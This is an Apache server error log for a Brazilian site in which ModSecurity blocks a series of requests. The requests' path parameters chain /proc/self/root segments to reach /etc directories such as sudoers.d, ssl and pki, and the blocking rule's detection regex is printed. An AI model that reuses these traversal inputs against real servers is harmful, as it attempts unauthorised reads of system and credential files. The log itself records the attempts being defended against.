https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:05:05.014007 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:59382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjAfu8EFLIOrSqIpv9rwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:05:06.832431 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:58902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjAsdf6f5d65gmYZTNhgAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:05:09.187830 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:52772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjBfu8EFLIOrSqIpv9swAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:06:22.055275 2026] [mime_magic:error] [pid 30077:tid 140411582465792] (70014)End of file found: [client 57.141.18.19:37136] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:06:30.427297 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.241.31:40824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjU-w_le52K8_3pV3Y3AAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:06:58.433858 2026] [mime_magic:error] [pid 19507:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:62413] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:07:18.038398 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:58916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjhtY0UrI5A3LftIyfJAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:19.543447 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:36444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjh9Y0UrI5A3LftIyfJwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:19.719035 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:36444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjh9Y0UrI5A3LftIyfKAAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:19.805525 2026] [mime_magic:error] [pid 30077:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:18772] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:07:21.067167 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:36458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjiSmAPhZkrhU8w4lmOwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:22.496715 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:36462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjiuyqAr6etmhZHNq4bAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:26.008713 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:36464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjjta6ubjKNq_cu4aS5wAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:27.347008 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:36480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjj9a6ubjKNq_cu4aS6AAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:31.014132 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:36486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjkdY0UrI5A3LftIyfOAAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:32.465696 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:35854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjlCmAPhZkrhU8w4lmRQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:33.711158 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:35868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjlSmAPhZkrhU8w4lmRgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:36.150975 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:35880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjmNY0UrI5A3LftIyfSAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:37.448934 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:35894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjmeyqAr6etmhZHNq4cAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:38.770954 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:35898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjmta6ubjKNq_cu4aS6QAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:40.295089 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:47702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjnNa6ubjKNq_cu4aS7AAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:43.926859 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:47714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjnymAPhZkrhU8w4lmTQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:51.020001 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:47726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjpuyqAr6etmhZHNq4dgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:07:53.680545 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:40736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqjqeyqAr6etmhZHNq4fQAAAFg"], 